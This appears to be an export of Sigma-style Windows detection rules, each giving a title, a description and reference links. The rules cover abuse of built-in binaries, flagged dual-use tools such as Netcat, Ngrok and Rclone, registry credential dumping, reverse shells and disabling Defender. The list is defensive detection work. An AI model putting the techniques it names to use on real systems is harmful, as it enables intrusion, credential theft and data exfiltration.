File Download Using ProtocolHandler.exe Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/
Suspicious Provlaunch.EXE Child Process Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Potential Provlaunch.EXE Binary Proxy Execution Abuse Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Screen Capture Activity Via Psr.EXE Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. https://lolbas-project.github.io/lolbas/Binaries/Psr/, https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
PUA - 3Proxy Execution Detects the use of 3proxy, a tiny free proxy server https://github.com/3proxy/3proxy, https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
PUA - AdFind Suspicious Execution Detects AdFind execution with common flags seen used during attacks https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects
PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE Detects active directory enumeration activity using known AdFind CLI flags https://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md
PUA - AdvancedRun Execution Detects the execution of AdvancedRun utility https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - AdvancedRun Suspicious Execution Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - Advanced IP Scanner Execution Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner
PUA - Advanced Port Scanner Execution Detects the use of Advanced Port Scanner. https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner
PUA - Chisel Tunneling Tool Execution Detects usage of the Chisel tunneling tool via the commandline arguments https://github.com/jpillora/chisel/, https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/, https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/
PUA - CleanWipe Execution Detects the use of CleanWipe, a tool usually used to delete Symantec antivirus. https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe
PUA - Crassus Execution Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. https://github.com/vu-ls/Crassus
PUA - CsExec Execution Detects the use of the lesser known remote execution tool named CsExec, a PsExec alternative https://github.com/malcomvetter/CSExec, https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/
PUA - DIT Snapshot Viewer Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap
PUA - DefenderCheck Execution Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. https://github.com/matterpreter/DefenderCheck
PUA - Fast Reverse Proxy (FRP) Execution Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. https://asec.ahnlab.com/en/38156/, https://github.com/fatedier/frp
PUA - IOX Tunneling Tool Execution Detects the use of IOX, a tool for port forwarding and intranet proxy purposes https://github.com/EddieIvan01/iox
PUA - Mouse Lock Execution In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf, https://sourceforge.net/projects/mouselock/
PUA - Netcat Suspicious Execution Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network https://nmap.org/ncat/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md, https://www.revshells.com/
PUA - SoftPerfect Netscan Execution Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/, https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf, https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue, https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/, https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/, https://www.softperfect.com/products/networkscanner/
PUA - Ngrok Execution Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections. https://ngrok.com/docs, https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp, https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection, https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/, https://twitter.com/xorJosh/status/1598646907802451969, https://www.softwaretestinghelp.com/how-to-use-ngrok/
PUA - Nimgrab Execution Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
PUA - NirCmd Execution Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using
PUA - NirCmd Execution As LOCAL SYSTEM Detects the use of NirCmd tool for command execution as SYSTEM user https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using
PUA - Nmap/Zenmap Execution Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation https://nmap.org/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows
PUA - NPS Tunneling Tool Execution Detects the use of NPS, a port forwarding and intranet penetration proxy server https://github.com/ehang-io/nps
PUA - NSudo Execution Detects the use of NSudo tool for command execution https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - PingCastle Execution Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
PUA - PingCastle Execution From Potentially Suspicious Parent Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
PUA - Process Hacker Execution Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes. https://processhacker.sourceforge.io/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/
PUA - Radmin Viewer Utility Execution Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md, https://www.radmin.fr/
PUA - Potential PE Metadata Tamper Using Rcedit Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe, https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915, https://github.com/electron/rcedit
PUA - Rclone Execution Detects execution of the RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc. https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
PUA - RunXCmd Execution Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts https://www.d7xtech.com/free-software/runx/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - Seatbelt Execution Detects the execution of the PUA/Recon tool Seatbelt via PE information or command line parameters https://github.com/GhostPack/Seatbelt, https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html
PUA - System Informer Execution Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations https://github.com/winsiderss/systeminformer
PUA - WebBrowserPassView Execution Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md
PUA - Wsudo Suspicious Execution Detects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator, etc.) https://github.com/M2Team/Privexec/
PUA - Adidnsdump Execution This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. Python 3 and python.exe must be installed. Used to query/modify DNS records for Active Directory integrated DNS via LDAP https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump
Python Inline Command Execution Detects execution of python using the "-c" flag. This could be used as a way to launch a reverse shell or execute live Python code. https://docs.python.org/3/using/cmdline.html#cmdoption-c, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Python Spawning Pretty TTY on Windows Detects python spawning a pretty tty https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Potentially Suspicious Usage Of Qemu Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. https://securelist.com/network-tunneling-with-qemu/111803/, https://www.qemu.org/docs/master/system/invocation.html#hxtool-5
Query Usage To Exfil Data Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use https://twitter.com/MichalKoczwara/status/1553634816016498688
QuickAssist Execution Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist
Rar Usage with Password and Compression Level Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/, https://ss64.com/bash/rar.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
Files Added To An Archive Using Rar.EXE Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md, https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html
Suspicious Greedy Compression Using Rar.EXE Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes https://decoded.avast.io/martinchlumecky/png-steganography
Suspicious RASdial Activity Detects suspicious process related to rasdial.exe https://twitter.com/subTee/status/891298217907830785
Process Memory Dump via RdrLeakDiag.EXE Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory https://www.pureid.io/dumping-abusing-windows-credentials-part-1/, https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/, https://twitter.com/0gtweet/status/1299071304805560321?s=21, https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
Exports Critical Registry Keys To a File Detects the export of a critical Registry key to a file. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Exports Registry Key To a File Detects the export of the target Registry key to a file. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Imports Registry Key From a File Detects the import of the specified file to the registry with regedit.exe. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Imports Registry Key From an ADS Detects the import of an alternate data stream to the registry with regedit.exe. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Regedit as Trusted Installer Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe https://twitter.com/1kwpeter/status/1397816101455765504
Suspicious Registry Modification From ADS Via Regini.EXE Detects the import of an alternate data stream with regini.exe, which can be used to modify registry keys. https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini
Registry Modification Via Regini.EXE Detects the execution of regini.exe, which can be used to modify registry keys; the changes are imported from one or more text files. https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini
DLL Execution Via Register-cimprovider.exe Detects using register-cimprovider.exe to execute an arbitrary DLL file. https://twitter.com/PhilipTsukerman/status/992021361106268161, https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/
Enumeration for 3rd Party Creds From CLI Detects processes that query known 3rd party registry keys that hold credentials via the command line https://isc.sans.edu/diary/More+Data+Exfiltration/25698, https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt, https://github.com/HyperSine/how-does-MobaXterm-encrypt-password, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry
Suspicious Debugger Registration Cmdline Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content
Potential Persistence Via Logon Scripts - CommandLine Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html
Potential Credential Dumping Attempt Using New NetworkProvider - CLI Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Python Function Execution Security Warning Disabled In Excel Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
Potential Privilege Escalation via Service Permissions Weakness Detects modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/31/insecure-registry-permissions/
Potential Provisioning Registry Key Abuse For Binary Proxy Execution Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Potential PowerShell Execution Policy Tampering - ProcCreation Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
Hiding User Account Via SpecialAccounts Registry Key - CommandLine Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/, https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/, https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Persistence Via TypedPaths - CommandLine Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html
Potential Regsvr32 Commandline Flag Anomaly Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. https://twitter.com/sbousseaden/status/1282441816986484737?s=12
Potentially Suspicious Regsvr32 HTTP IP Pattern Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
Potentially Suspicious Regsvr32 HTTP/FTP Pattern Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
Suspicious Regsvr32 Execution From Remote Share Detects REGSVR32.exe executing a DLL hosted on a remote share https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
Potentially Suspicious Child Process Of Regsvr32 Detects potentially suspicious child processes of "regsvr32.exe". https://redcanary.com/blog/intelligence-insights-april-2022/, https://www.echotrail.io/insights/search/regsvr32.exe, https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo
Regsvr32 Execution From Potential Suspicious Location Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Regsvr32 Execution From Highly Suspicious Location Detects execution of regsvr32 where the DLL is located in a highly suspicious location. Internal Research
Regsvr32 DLL Execution With Suspicious File Extension Detects the execution of REGSVR32.exe with DLL files masquerading as other files https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/, https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://guides.lib.umich.edu/c.php?g=282942&p=1885348
Scripting/CommandLine Process Spawned Regsvr32 Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Regsvr32 DLL Execution With Uncommon Extension Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Potential Persistence Attempt Via Run Keys Using Reg.EXE Detects suspicious command lines in which the reg.exe tool adds a value to a Run key in the registry. https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/, https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
Add SafeBoot Keys Via Reg Utility Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attackers to allow ransomware to work in safe mode, as some security products do not. https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
Suspicious Reg Add BitLocker Detects suspicious addition to BitLocker related registry keys via the reg.exe utility https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
Dropping Of Password Filter DLL Detects the dropping of DLL files into System32 that may be used to retrieve user credentials from LSASS. https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/, https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter
SafeBoot Registry Key Deleted Via Reg.EXE Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attackers to prevent safe boot execution of security products. https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/
Service Registry Key Deleted Via Reg.EXE Detects execution of "reg.exe" commands with the "delete" flag on a service registry key. Often used by attackers to remove AV software services. https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
Potentially Suspicious Desktop Background Change Using Reg.EXE Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image. https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI
Direct Autorun Keys Modification Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
Security Service Disabled Via Reg.EXE Detects execution of "reg.exe" to disable security services such as Windows Defender. https://twitter.com/JohnLaTwC/status/1415295021041979392, https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1, https://vms.drweb.fr/virus/?i=24144899, https://bidouillesecurity.com/disable-windows-defender-in-powershell/
Dumping of Sensitive Hives Via Reg.EXE Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md, https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
Windows Recall Feature Enabled Via Reg.EXE Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
